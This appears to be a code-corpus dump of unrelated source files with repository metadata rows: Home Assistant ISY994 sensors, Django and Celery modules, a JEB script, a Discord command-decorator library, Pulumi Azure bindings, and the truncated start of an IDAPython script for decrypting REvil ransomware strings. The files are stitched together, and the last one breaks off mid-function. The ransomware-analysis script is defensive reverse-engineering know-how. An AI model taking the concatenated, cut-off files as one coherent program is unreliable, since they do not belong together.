] | 6 | 2018-02-04T03:48:55.000Z | 2022-01-24T20:37:04.000Z | """Support for ISY994 binary sensors."""
from __future__ import annotations
from datetime import timedelta
from pyisy.constants import (
CMD_OFF,
CMD_ON,
ISY_VALUE_UNKNOWN,
PROTO_INSTEON,
PROTO_ZWAVE,
)
from pyisy.nodes import Group, Node
from homeassistant.components.binary_sensor import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_COLD,
DEVICE_CLASS_HEAT,
DEVICE_CLASS_LIGHT,
DEVICE_CLASS_MOISTURE,
DEVICE_CLASS_MOTION,
DEVICE_CLASS_OPENING,
DEVICE_CLASS_PROBLEM,
DOMAIN as BINARY_SENSOR,
BinarySensorEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_track_point_in_utc_time
from homeassistant.util import dt as dt_util
from .const import (
_LOGGER,
BINARY_SENSOR_DEVICE_TYPES_ISY,
BINARY_SENSOR_DEVICE_TYPES_ZWAVE,
DOMAIN as ISY994_DOMAIN,
ISY994_NODES,
ISY994_PROGRAMS,
SUBNODE_CLIMATE_COOL,
SUBNODE_CLIMATE_HEAT,
SUBNODE_DUSK_DAWN,
SUBNODE_HEARTBEAT,
SUBNODE_LOW_BATTERY,
SUBNODE_MOTION_DISABLED,
SUBNODE_NEGATIVE,
SUBNODE_TAMPER,
TYPE_CATEGORY_CLIMATE,
TYPE_INSTEON_MOTION,
)
from .entity import ISYNodeEntity, ISYProgramEntity
from .helpers import migrate_old_unique_ids
DEVICE_PARENT_REQUIRED = [
DEVICE_CLASS_OPENING,
DEVICE_CLASS_MOISTURE,
DEVICE_CLASS_MOTION,
]
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> bool:
"""Set up the ISY994 binary sensor platform."""
devices = []
devices_by_address = {}
child_nodes = []
hass_isy_data = hass.data[ISY994_DOMAIN][entry.entry_id]
for node in hass_isy_data[ISY994_NODES][BINARY_SENSOR]:
device_class, device_type = _detect_device_type_and_class(node)
if node.protocol == PROTO_INSTEON:
if node.parent_node is not None:
# We'll process the Insteon child nodes last, to ensure all parent
# nodes have been processed
child_nodes.append((node, device_class, device_type))
continue
device = ISYInsteonBinarySensorEntity(node, device_class)
else:
device = ISYBinarySensorEntity(node, device_class)
devices.append(device)
devices_by_address[node.address] = device
# Handle some special child node cases for Insteon Devices
for (node, device_class, device_type) in child_nodes:
subnode_id = int(node.address.split(" ")[-1], 16)
# Handle Insteon Thermostats
if device_type.startswith(TYPE_CATEGORY_CLIMATE):
if subnode_id == SUBNODE_CLIMATE_COOL:
# Subnode 2 is the "Cool Control" sensor
# It never reports its state until first use is
# detected after an ISY Restart, so we assume it's off.
# As soon as the ISY Event Stream connects if it has a
# valid state, it will be set.
device = ISYInsteonBinarySensorEntity(node, DEVICE_CLASS_COLD, False)
devices.append(device)
elif subnode_id == SUBNODE_CLIMATE_HEAT:
# Subnode 3 is the "Heat Control" sensor
device = ISYInsteonBinarySensorEntity(node, DEVICE_CLASS_HEAT, False)
devices.append(device)
continue
if device_class in DEVICE_PARENT_REQUIRED:
parent_device = devices_by_address.get(node.parent_node.address)
if not parent_device:
_LOGGER.error(
"Node %s has a parent node %s, but no device "
"was created for the parent. Skipping",
node.address,
node.parent_node,
)
continue
if device_class in (DEVICE_CLASS_OPENING, DEVICE_CLASS_MOISTURE):
# These sensors use an optional "negative" subnode 2 to
# snag all state changes
if subnode_id == SUBNODE_NEGATIVE:
parent_device.add_negative_node(node)
elif subnode_id == SUBNODE_HEARTBEAT:
# Subnode 4 is the heartbeat node, which we will
# represent as a separate binary_sensor
device = ISYBinarySensorHeartbeat(node, parent_device)
parent_device.add_heartbeat_device(device)
devices.append(device)
continue
if (
device_class == DEVICE_CLASS_MOTION
and device_type is not None
and any(device_type.startswith(t) for t in TYPE_INSTEON_MOTION)
):
# Special cases for Insteon Motion Sensors I & II:
# Some subnodes never report status until activated, so
# the initial state is forced "OFF"/"NORMAL" if the
# parent device has a valid state. This is corrected
# upon connection to the ISY event stream if subnode has a valid state.
initial_state = None if parent_device.state is None else False
if subnode_id == SUBNODE_DUSK_DAWN:
# Subnode 2 is the Dusk/Dawn sensor
device = ISYInsteonBinarySensorEntity(node, DEVICE_CLASS_LIGHT)
devices.append(device)
continue
if subnode_id == SUBNODE_LOW_BATTERY:
# Subnode 3 is the low battery node
device = ISYInsteonBinarySensorEntity(
node, DEVICE_CLASS_BATTERY, initial_state
)
devices.append(device)
continue
if subnode_id in SUBNODE_TAMPER:
# Tamper Sub-node for MS II. Sometimes reported as "A" sometimes
# reported as "10", which translate from Hex to 10 and 16 resp.
device = ISYInsteonBinarySensorEntity(
node, DEVICE_CLASS_PROBLEM, initial_state
)
devices.append(device)
continue
if subnode_id in SUBNODE_MOTION_DISABLED:
# Motion Disabled Sub-node for MS II ("D" or "13")
device = ISYInsteonBinarySensorEntity(node)
devices.append(device)
continue
# We don't yet have any special logic for other sensor
# types, so add the nodes as individual devices
device = ISYBinarySensorEntity(node, device_class)
devices.append(device)
for name, status, _ in hass_isy_data[ISY994_PROGRAMS][BINARY_SENSOR]:
devices.append(ISYBinarySensorProgramEntity(name, status))
await migrate_old_unique_ids(hass, BINARY_SENSOR, devices)
async_add_entities(devices)
def _detect_device_type_and_class(node: Group | Node) -> (str, str):
try:
device_type = node.type
except AttributeError:
# The type attribute didn't exist in the ISY's API response
return (None, None)
# Z-Wave Devices:
if node.protocol == PROTO_ZWAVE:
device_type = f"Z{node.zwave_props.category}"
for device_class in [*BINARY_SENSOR_DEVICE_TYPES_ZWAVE]:
if (
node.zwave_props.category
in BINARY_SENSOR_DEVICE_TYPES_ZWAVE[device_class]
):
return device_class, device_type
return (None, device_type)
# Other devices (incl Insteon.)
for device_class in [*BINARY_SENSOR_DEVICE_TYPES_ISY]:
if any(
device_type.startswith(t)
for t in set(BINARY_SENSOR_DEVICE_TYPES_ISY[device_class])
):
return device_class, device_type
return (None, device_type)
class ISYBinarySensorEntity(ISYNodeEntity, BinarySensorEntity):
"""Representation of a basic ISY994 binary sensor device."""
def __init__(self, node, force_device_class=None, unknown_state=None) -> None:
"""Initialize the ISY994 binary sensor device."""
super().__init__(node)
self._device_class = force_device_class
@property
def is_on(self) -> bool:
"""Get whether the ISY994 binary sensor device is on."""
if self._node.status == ISY_VALUE_UNKNOWN:
return None
return bool(self._node.status)
@property
def device_class(self) -> str:
"""Return the class of this device.
This was discovered by parsing the device type code during init
"""
return self._device_class
class ISYInsteonBinarySensorEntity(ISYBinarySensorEntity):
"""Representation of an ISY994 Insteon binary sensor device.
Often times, a single device is represented by multiple nodes in the ISY,
allowing for different nuances in how those devices report their on and
off events. This class turns those multiple nodes into a single Home
Assistant entity and handles both ways that ISY binary sensors can work.
"""
def __init__(self, node, force_device_class=None, unknown_state=None) -> None:
"""Initialize the ISY994 binary sensor device."""
super().__init__(node, force_device_class)
self._negative_node = None
self._heartbeat_device = None
if self._node.status == ISY_VALUE_UNKNOWN:
self._computed_state = unknown_state
self._status_was_unknown = True
else:
self._computed_state = bool(self._node.status)
self._status_was_unknown = False
async def async_added_to_hass(self) -> None:
"""Subscribe to the node and subnode event emitters."""
await super().async_added_to_hass()
self._node.control_events.subscribe(self._async_positive_node_control_handler)
if self._negative_node is not None:
self._negative_node.control_events.subscribe(
self._async_negative_node_control_handler
)
def add_heartbeat_device(self, device) -> None:
"""Register a heartbeat device for this sensor.
The heartbeat node beats on its own, but we can gain a little
reliability by considering any node activity for this sensor
to be a heartbeat as well.
"""
self._heartbeat_device = device
def _async_heartbeat(self) -> None:
"""Send a heartbeat to our heartbeat device, if we have one."""
if self._heartbeat_device is not None:
self._heartbeat_device.async_heartbeat()
def add_negative_node(self, child) -> None:
"""Add a negative node to this binary sensor device.
The negative node is a node that can receive the 'off' events
for the sensor, depending on device configuration and type.
"""
self._negative_node = child
# If the negative node has a value, it means the negative node is
# in use for this device. Next we need to check to see if the
# negative and positive nodes disagree on the state (both ON or
# both OFF).
if (
self._negative_node.status != ISY_VALUE_UNKNOWN
and self._negative_node.status == self._node.status
):
# The states disagree, therefore we cannot determine the state
# of the sensor until we receive our first ON event.
self._computed_state = None
@callback
def _async_negative_node_control_handler(self, event: object) -> None:
"""Handle an "On" control event from the "negative" node."""
if event.control == CMD_ON:
_LOGGER.debug(
"Sensor %s turning Off via the Negative node sending a DON command",
self.name,
)
self._computed_state = False
self.async_write_ha_state()
self._async_heartbeat()
@callback
def _async_positive_node_control_handler(self, event: object) -> None:
"""Handle On and Off control event coming from the primary node.
Depending on device configuration, sometimes only On events
will come to this node, with the negative node representing Off
events
"""
if event.control == CMD_ON:
_LOGGER.debug(
"Sensor %s turning On via the Primary node sending a DON command",
self.name,
)
self._computed_state = True
self.async_write_ha_state()
self._async_heartbeat()
if event.control == CMD_OFF:
_LOGGER.debug(
"Sensor %s turning Off via the Primary node sending a DOF command",
self.name,
)
self._computed_state = False
self.async_write_ha_state()
self._async_heartbeat()
@callback
def async_on_update(self, event: object) -> None:
"""Primary node status updates.
We MOSTLY ignore these updates, as we listen directly to the Control
events on all nodes for this device. However, there is one edge case:
If a leak sensor is unknown, due to a recent reboot of the ISY, the
status will get updated to dry upon the first heartbeat. This status
update is the only way that a leak sensor's status changes without
an accompanying Control event, so we need to watch for it.
"""
if self._status_was_unknown and self._computed_state is None:
self._computed_state = bool(self._node.status)
self._status_was_unknown = False
self.async_write_ha_state()
self._async_heartbeat()
@property
def is_on(self) -> bool:
"""Get whether the ISY994 binary sensor device is on.
Insteon leak sensors set their primary node to On when the state is
DRY, not WET, so we invert the binary state if the user indicates
that it is a moisture sensor.
"""
if self._computed_state is None:
# Do this first so we don't invert None on moisture sensors
return None
if self.device_class == DEVICE_CLASS_MOISTURE:
return not self._computed_state
return self._computed_state
class ISYBinarySensorHeartbeat(ISYNodeEntity, BinarySensorEntity):
"""Representation of the battery state of an ISY994 sensor."""
def __init__(self, node, parent_device) -> None:
"""Initialize the ISY994 binary sensor device.
Computed state is set to UNKNOWN unless the ISY provided a valid
state. See notes above regarding ISY Sensor status on ISY restart.
If a valid state is provided (either on or off), the computed state in
HA is set to OFF (Normal). If the heartbeat is not received in 25 hours
then the computed state is set to ON (Low Battery).
"""
super().__init__(node)
self._parent_device = parent_device
self._heartbeat_timer = None
self._computed_state = None
if self.state is None:
self._computed_state = False
async def async_added_to_hass(self) -> None:
"""Subscribe to the node and subnode event emitters."""
await super().async_added_to_hass()
self._node.control_events.subscribe(self._heartbeat_node_control_handler)
# Start the timer on bootup, so we can change from UNKNOWN to OFF
self._restart_timer()
def _heartbeat_node_control_handler(self, event: object) -> None:
"""Update the heartbeat timestamp when any ON/OFF event is sent.
The ISY uses both DON and DOF commands (alternating) for a heartbeat.
"""
if event.control in [CMD_ON, CMD_OFF]:
self.async_heartbeat()
@callback
def async_heartbeat(self):
"""Mark the device as online, and restart the 25 hour timer.
This gets called when the heartbeat node beats, but also when the
parent sensor sends any events, as we can trust that to mean the device
is online. This mitigates the risk of false positives due to a single
missed heartbeat event.
"""
self._computed_state = False
self._restart_timer()
self.async_write_ha_state()
def _restart_timer(self):
"""Restart the 25 hour timer."""
try:
self._heartbeat_timer()
self._heartbeat_timer = None
except TypeError:
# No heartbeat timer is active
pass
@callback
def timer_elapsed(now) -> None:
"""Heartbeat missed; set state to ON to indicate dead battery."""
self._computed_state = True
self._heartbeat_timer = None
self.async_write_ha_state()
point_in_time = dt_util.utcnow() + timedelta(hours=25)
_LOGGER.debug(
"Heartbeat timer starting. Now: %s Then: %s",
dt_util.utcnow(),
point_in_time,
)
self._heartbeat_timer = async_track_point_in_utc_time(
self.hass, timer_elapsed, point_in_time
)
@callback
def async_on_update(self, event: object) -> None:
"""Ignore node status updates.
We listen directly to the Control events for this device.
"""
@property
def is_on(self) -> bool:
"""Get whether the ISY994 binary sensor device is on.
Note: This method will return false if the current state is UNKNOWN
which occurs after a restart until the first heartbeat or control
parent control event is received.
"""
return bool(self._computed_state)
@property
def device_class(self) -> str:
"""Get the class of this device."""
return DEVICE_CLASS_BATTERY
@property
def extra_state_attributes(self):
"""Get the state attributes for the device."""
attr = super().extra_state_attributes
attr["parent_entity_id"] = self._parent_device.entity_id
return attr
class ISYBinarySensorProgramEntity(ISYProgramEntity, BinarySensorEntity):
"""Representation of an ISY994 binary sensor program.
This does not need all of the subnode logic in the device version of binary
sensors.
"""
@property
def is_on(self) -> bool:
"""Get whether the ISY994 binary sensor device is on."""
return bool(self._node.status)
| 37.822314 | 86 | 0.644925 |
4a259dd0d1bbe036115006893111ba8f7bbff167 | 341 | py | Python | ledger/urls.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | 1 | 2018-05-01T04:54:36.000Z | 2018-05-01T04:54:36.000Z | ledger/urls.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | null | null | null | ledger/urls.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | 3 | 2018-04-13T18:28:32.000Z | 2018-05-01T01:38:38.000Z | from django.urls import path
from . import views
from ledger.views import ListGlobalOperationsView,ListUserOperationsView
app_name = 'ledger'
urlpatterns=[
path('operations_global/', ListGlobalOperationsView.as_view(), name='globaloperations'),
path('operations_user/', ListUserOperationsView.as_view(), name='useroperations'),
] | 28.416667 | 92 | 0.788856 |
4a259fc9b3d803e7c68dacab166c4c9df27bc402 | 2,227 | py | Python | celery/events/dumper.py | coderanger/celery | b34074a5840086dd2a1e04e241fd9b6fabc0a570 | [
"BSD-3-Clause"
] | 1 | 2020-12-29T06:25:25.000Z | 2020-12-29T06:25:25.000Z | celery/events/dumper.py | coderanger/celery | b34074a5840086dd2a1e04e241fd9b6fabc0a570 | [
"BSD-3-Clause"
] | null | null | null | celery/events/dumper.py | coderanger/celery | b34074a5840086dd2a1e04e241fd9b6fabc0a570 | [
"BSD-3-Clause"
] | null | null | null | import sys
from datetime import datetime
from celery.app import app_or_default
from celery.datastructures import LocalCache
from celery.events import EventReceiver
TASK_NAMES = LocalCache(0xFFF)
HUMAN_TYPES = {"worker-offline": "shutdown",
"worker-online": "started",
"worker-heartbeat": "heartbeat"}
def humanize_type(type):
try:
return HUMAN_TYPES[type.lower()]
except KeyError:
return type.lower().replace("-", " ")
class Dumper(object):
def on_event(self, event):
timestamp = datetime.fromtimestamp(event.pop("timestamp"))
type = event.pop("type").lower()
hostname = event.pop("hostname")
if type.startswith("task-"):
uuid = event.pop("uuid")
if type.startswith("task-received"):
task = TASK_NAMES[uuid] = "%s(%s) args=%s kwargs=%s" % (
event.pop("name"), uuid,
event.pop("args"),
event.pop("kwargs"))
else:
task = TASK_NAMES.get(uuid, "")
return self.format_task_event(hostname, timestamp,
type, task, event)
fields = ", ".join("%s=%s" % (key, event[key])
for key in sorted(event.keys()))
sep = fields and ":" or ""
print("%s [%s] %s%s %s" % (hostname, timestamp,
humanize_type(type), sep, fields))
def format_task_event(self, hostname, timestamp, type, task, event):
fields = ", ".join("%s=%s" % (key, event[key])
for key in sorted(event.keys()))
sep = fields and ":" or ""
print("%s [%s] %s%s %s %s" % (hostname, timestamp,
humanize_type(type), sep, task, fields))
def evdump(app=None):
sys.stderr.write("-> evdump: starting capture...\n")
app = app_or_default(app)
dumper = Dumper()
conn = app.broker_connection()
recv = EventReceiver(conn, app=app, handlers={"*": dumper.on_event})
try:
recv.capture()
except (KeyboardInterrupt, SystemExit):
conn and conn.close()
if __name__ == "__main__":
evdump()
| 32.75 | 76 | 0.541536 |
4a259fcf0e33cddfec92237169378e9ef4ad5e5f | 282 | py | Python | buggy_django_app/users/apps.py | AndrewGHC/buggy_django_app | f5f0b8e58b993c60c2a98ac1874f320c0c2e4ace | [
"MIT"
] | null | null | null | buggy_django_app/users/apps.py | AndrewGHC/buggy_django_app | f5f0b8e58b993c60c2a98ac1874f320c0c2e4ace | [
"MIT"
] | null | null | null | buggy_django_app/users/apps.py | AndrewGHC/buggy_django_app | f5f0b8e58b993c60c2a98ac1874f320c0c2e4ace | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'buggy_django_app.users'
verbose_name = "Users"
def ready(self):
"""Override this to put in:
Users system checks
Users signal registration
"""
pass
| 20.142857 | 37 | 0.606383 |
4a259ff82ff3ca5c2975fc11d7d4e841e5865c08 | 1,870 | py | Python | samples/64 Native-Contain.py | acbocai/jeb_script | 5d918a2abb7e50fbbb4c571122741d52b20959fd | [
"BSD-2-Clause"
] | 25 | 2020-10-27T11:26:02.000Z | 2022-03-31T01:40:20.000Z | samples/64 Native-Contain.py | acbocai/jeb_script | 5d918a2abb7e50fbbb4c571122741d52b20959fd | [
"BSD-2-Clause"
] | null | null | null | samples/64 Native-Contain.py | acbocai/jeb_script | 5d918a2abb7e50fbbb4c571122741d52b20959fd | [
"BSD-2-Clause"
] | 9 | 2020-12-10T20:13:23.000Z | 2022-03-04T07:09:14.000Z | # -*- coding: utf-8 -*-
from com.pnfsoftware.jeb.client.api import IClientContext
from com.pnfsoftware.jeb.core import IRuntimeProject
from com.pnfsoftware.jeb.core.units import IUnit, INativeCodeUnit
from com.pnfsoftware.jeb.core.units.code import EntryPointDescription
from com.pnfsoftware.jeb.core.units.code.asm.analyzer import INativeCodeAnalyzer, INativeCodeModel, IReferenceManager, ICallGraphManager, ICallGraph, CallGraphVertex
from com.pnfsoftware.jeb.core.units.code.asm.items import INativeMethodItem
def Test(ctx):
assert isinstance(ctx,IClientContext)
input_path = r"D:\tmp\2\project\about_dex_diff\code\xmly\libFace3D.so"
unit = ctx.open(input_path); assert isinstance(unit,IUnit)
prj = ctx.getMainProject(); assert isinstance(prj,IRuntimeProject)
# 获取INativeCodeUnit并执行解析
nativeCodeUnit = prj.findUnit(INativeCodeUnit); assert isinstance(nativeCodeUnit,INativeCodeUnit)
bool = nativeCodeUnit.process()
# 获取INativeCodeAnalyzer,获取INativeCodeModel
nativeCodeAnalyzer = nativeCodeUnit.getCodeAnalyzer(); assert isinstance(nativeCodeAnalyzer,INativeCodeAnalyzer)
nativeCodeAnalyzer.analyze()
nativeCodeModel = nativeCodeAnalyzer.getModel(); assert isinstance(nativeCodeModel,INativeCodeModel)
# 返回该地址所在函数的首地址
print "-------------------"
r = nativeCodeModel.getContainedRoutineAddresses(0x19A60)
print ">>> ",hex(r[0])
# 返回该地址所在基本块
print "-------------------"
r = nativeCodeModel.getBasicBlockHeader(0x19A60)
for insn in r.getInstructions():
print ">>> ",insn.getMnemonic()
# -------------------
# >>> 0x19a1cL
# -------------------
# >>> LDR
# >>> LDR
# >>> SUBS
# >>> ITTT
# >>> ADDEQ
# >>> POPEQ
# >>> POPEQ | 41.555556 | 165 | 0.659893 |
4a25a04981bce981f3a9543380bcbd3612978589 | 8,993 | py | Python | interactions/ext/enhanced/commands.py | Toricane/better-interactions | 6146945b7a1b818668a8ddca0282bd1900772205 | [
"MIT"
] | 2 | 2022-02-16T16:49:11.000Z | 2022-02-21T18:29:11.000Z | interactions/ext/enhanced/commands.py | Toricane/better-interactions | 6146945b7a1b818668a8ddca0282bd1900772205 | [
"MIT"
] | 1 | 2022-03-10T01:16:02.000Z | 2022-03-11T03:44:40.000Z | interactions/ext/enhanced/commands.py | Toricane/better-interactions | 6146945b7a1b818668a8ddca0282bd1900772205 | [
"MIT"
] | 1 | 2022-03-07T05:06:01.000Z | 2022-03-07T05:06:01.000Z | """
commands
Content:
* command: enhanced command decorator
* extension_command: enhanced extension command decorator
* autodefer: autodefer decorator
GitHub: https://github.com/interactions-py/enhanced/blob/main/interactions/ext/enhanced/commands.py
(c) 2022 interactions-py.
"""
from asyncio import Task, get_running_loop, sleep
from functools import wraps
from inspect import getdoc, signature
from logging import Logger
from typing import Any, Callable, Coroutine, Dict, List, Optional, Union
from interactions.client.decor import command as old_command
from typing_extensions import _AnnotatedAlias
from interactions import (
MISSING,
ApplicationCommandType,
Client,
CommandContext,
ComponentContext,
Guild,
Option,
)
from ._logging import get_logger
from .command_models import EnhancedOption, parameters_to_options
from .new_subcommands import Manager
log: Logger = get_logger("command")
def command(
self: Client,
_coro: Optional[Coroutine] = MISSING,
*,
type: Optional[Union[int, ApplicationCommandType]] = ApplicationCommandType.CHAT_INPUT,
name: Optional[str] = MISSING,
description: Optional[str] = MISSING,
scope: Optional[Union[int, Guild, List[int], List[Guild]]] = MISSING,
options: Optional[Union[Dict[str, Any], List[Dict[str, Any]], Option, List[Option]]] = MISSING,
default_permission: Optional[bool] = MISSING,
debug_scope: Optional[bool] = True,
) -> Callable[..., Any]:
"""
A modified decorator for creating slash commands.
Makes `name` and `description` optional, and adds ability to use `EnhancedOption`s.
Full-blown example:
```py
from interactions import OptionType, Channel
from interactions.ext.enhanced import EnhancedOption
from typing_extensions import Annotated
@bot.command()
async def options(
ctx,
option1: Annotated[str, EnhancedOption(description="...")],
option2: Annotated[OptionType.MENTIONABLE, EnhancedOption(description="...")],
option3: Annotated[Channel, EnhancedOption(description="...")],
):
\"""Says something!\"""
await ctx.send("something")
```
Parameters:
* `?type: int | ApplicationCommandType`: The type of application command. Defaults to `ApplicationCommandType.CHAT_INPUT`.
* `?name: str`: The name of the command. Defaults to function name.
* `?description: str`: The description of the command. Defaults to function docstring or `"No description"`.
* `?scope: int | Guild | list[int] | list[Guild]`: The scope of the command.
* `?options: list[Option]`: The options of the command.
* `?default_permission: bool`: The default permission of the command.
* `?debug_scope: bool`: Whether to use debug_scope for this command. Defaults to `True`.
"""
def decorator(coro: Coroutine) -> Callable[..., Any]:
_name = coro.__name__ if name is MISSING else name
_description = (
MISSING
if type != ApplicationCommandType.CHAT_INPUT
else getdoc(coro) or "No description"
if description is MISSING
else description
)
if isinstance(_description, str):
_description = _description.split("\n")[0]
if len(_description) > 100:
raise ValueError("Description must be less than 100 characters.")
_scope = (
self.__debug_scope
if scope is MISSING and hasattr(self, "__debug_scope") and debug_scope
else scope
)
params = signature(coro).parameters
_options = (
coro.__decor_options
if hasattr(coro, "__decor_options")
else parameters_to_options(params)
if options is MISSING
and len(params) > 1
and any(
isinstance(param.annotation, (EnhancedOption, _AnnotatedAlias))
for _, param in params.items()
)
else options
)
log.debug(f"command: {_name=} {_description=} {_options=}")
if not hasattr(coro, "manager"):
coro.manager = Manager(coro, _name, _description, _scope, default_permission, self)
coro.subcommand = coro.manager.subcommand
coro.group = coro.manager.group
cmd_data = old_command(
type=type,
name=_name,
description=_description,
scope=_scope,
options=_options,
default_permission=default_permission,
)
if not hasattr(self, "_command_data") or not self._command_data:
self._command_data = cmd_data
else:
self._command_data.extend(cmd_data)
if not hasattr(self, "_command_coros") or not self._command_coros:
self._command_coros = {_name: coro}
else:
self._command_coros[_name] = coro
if scope is not MISSING:
if isinstance(scope, List):
[self._scopes.add(_ if isinstance(_, int) else _.id) for _ in scope]
else:
self._scopes.add(scope if isinstance(scope, int) else scope.id)
return coro
if _coro is not MISSING:
return decorator(_coro)
return decorator
def extension_command(_coro: Optional[Coroutine] = MISSING, **kwargs):
"""
A modified decorator for creating slash commands inside `Extension`s.
Makes `name` and `description` optional, and adds ability to use `EnhancedOption`s.
Same parameters as `interactions.ext.enhanced.command`.
Parameters:
* `?type: int | ApplicationCommandType`: The type of application command. Defaults to `ApplicationCommandType.CHAT_INPUT`.
* `?name: str`: The name of the command. Defaults to function name.
* `?description: str`: The description of the command. Defaults to function docstring or `"No description"`.
* `?scope: int | Guild | list[int] | list[Guild]`: The scope of the command.
* `?options: list[Option]`: The options of the command.
* `?default_permission: bool`: The default permission of the command.
* `?debug_scope: bool`: Whether to use debug_scope for this command. Defaults to `True`.
"""
def decorator(coro):
kwargs["name"] = kwargs.get("name", coro.__name__)
kwargs["description"] = (
MISSING
if type != ApplicationCommandType.CHAT_INPUT
else kwargs.get("description", getdoc(coro) or "No description")
)
if isinstance(kwargs["description"], str):
kwargs["description"] = kwargs["description"].split("\n")[0]
if len(kwargs["description"]) > 100:
raise ValueError("Description must be less than 100 characters.")
coro.manager = Manager(
coro,
kwargs["name"],
kwargs["description"],
kwargs.get("scope"),
kwargs.get("default_permission"),
debug_scope=kwargs.get("debug_scope", True),
)
coro.subcommand = coro.manager.subcommand
coro.group = coro.manager.group
coro.__command_data__ = ((), kwargs)
log.debug(f"extension_command: {coro.__command_data__=}")
return coro
if _coro is not MISSING:
return decorator(_coro)
return decorator
def autodefer(
delay: Optional[Union[float, int]] = 2,
ephemeral: Optional[bool] = False,
edit_origin: Optional[bool] = False,
):
"""
Set up a command to be automatically deferred after some time.
Note: This will not work if blocking code is used (such as the requests module).
Usage:
```py
@bot.command(...)
@autodefer(...)
async def foo(ctx, ...):
...
```
Parameters:
* `?delay: float | int`: How long to wait before deferring in seconds. Defaults to `2`.
* `?ephemeral: bool`: If the command should be deferred hidden. Defaults to `False`.
* `?edit_origin: bool`: If the command should be deferred with the origin message. Defaults to `False`.
"""
def inner(func: Callable[..., Any]) -> Callable[..., Any]:
@wraps(func)
async def deferring_func(ctx: Union[CommandContext, ComponentContext], *args, **kwargs):
try:
loop = get_running_loop()
except RuntimeError as e:
raise RuntimeError("No running event loop detected!") from e
task: Task = loop.create_task(func(ctx, *args, **kwargs))
await sleep(delay)
if task.done():
return task.result()
if not (ctx.deferred or ctx.responded):
if isinstance(ctx, ComponentContext):
await ctx.defer(ephemeral=ephemeral, edit_origin=edit_origin)
else:
await ctx.defer(ephemeral=ephemeral)
return await task
return deferring_func
return inner
| 34.992218 | 126 | 0.628934 |
4a25a095af3783bcbe92807684f8134b2c43323d | 2,693 | py | Python | sdk/python/pulumi_azure_native/machinelearningservices/v20180301preview/list_machine_learning_compute_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/machinelearningservices/v20180301preview/list_machine_learning_compute_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/machinelearningservices/v20180301preview/list_machine_learning_compute_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'ListMachineLearningComputeKeysResult',
'AwaitableListMachineLearningComputeKeysResult',
'list_machine_learning_compute_keys',
]
@pulumi.output_type
class ListMachineLearningComputeKeysResult:
"""
Secrets related to a Machine Learning compute. Might differ for every type of compute.
"""
def __init__(__self__, compute_type=None):
if compute_type and not isinstance(compute_type, str):
raise TypeError("Expected argument 'compute_type' to be a str")
pulumi.set(__self__, "compute_type", compute_type)
@property
@pulumi.getter(name="computeType")
def compute_type(self) -> str:
"""
The type of compute
"""
return pulumi.get(self, "compute_type")
class AwaitableListMachineLearningComputeKeysResult(ListMachineLearningComputeKeysResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return ListMachineLearningComputeKeysResult(
compute_type=self.compute_type)
def list_machine_learning_compute_keys(compute_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
workspace_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableListMachineLearningComputeKeysResult:
"""
Secrets related to a Machine Learning compute. Might differ for every type of compute.
:param str compute_name: Name of the Azure Machine Learning compute.
:param str resource_group_name: Name of the resource group in which workspace is located.
:param str workspace_name: Name of Azure Machine Learning workspace.
"""
__args__ = dict()
__args__['computeName'] = compute_name
__args__['resourceGroupName'] = resource_group_name
__args__['workspaceName'] = workspace_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:machinelearningservices/v20180301preview:listMachineLearningComputeKeys', __args__, opts=opts, typ=ListMachineLearningComputeKeysResult).value
return AwaitableListMachineLearningComputeKeysResult(
compute_type=__ret__.compute_type)
| 39.028986 | 192 | 0.705533 |
4a25a0b455c22974db1bf1b0745f14fba0b48b9a | 1,449 | py | Python | python/flare/revil_string_decrypt.py | clayne/flare-ida | b5b3993bdd224b7d6d7bd524045195550c156c44 | [
"Apache-2.0"
] | 1,471 | 2015-01-12T07:00:10.000Z | 2021-09-20T04:30:20.000Z | python/flare/revil_string_decrypt.py | clayne/flare-ida | b5b3993bdd224b7d6d7bd524045195550c156c44 | [
"Apache-2.0"
] | 80 | 2015-01-12T08:28:28.000Z | 2021-08-23T13:33:03.000Z | python/flare/revil_string_decrypt.py | clayne/flare-ida | b5b3993bdd224b7d6d7bd524045195550c156c44 | [
"Apache-2.0"
] | 427 | 2015-01-03T05:39:27.000Z | 2021-09-07T01:49:16.000Z | ############################################
# Copyright (C) 2021 FireEye, Inc.
#
# Author: Chuong Dong
#
# revil_string_decrypt is an IDAPython script that uses flare-emu (which combines Unicorn and
# IDA Pro) to automate string decryption for REvil ransomware samples.
#
# Dependencies:
# https://github.com/fireeye/flare-emu
############################################
from arc4 import ARC4
import idaapi, idc, idautils
import flare_emu
import idc
import idaapi
def RC4_crypt(key, buffer):
arc4 = ARC4(key)
result = list(arc4.decrypt(buffer))
string_result = ''
for each in result:
if each != 0:
string_result += chr(each)
return string_result
def decode_callback(eh, address, argv, userData):
encoded_str_ea = eh.getRegVal('edx')
ENCRYPTED_STRING_BUFFER = argv[0]
key_offset = argv[1]
key_length = argv[2]
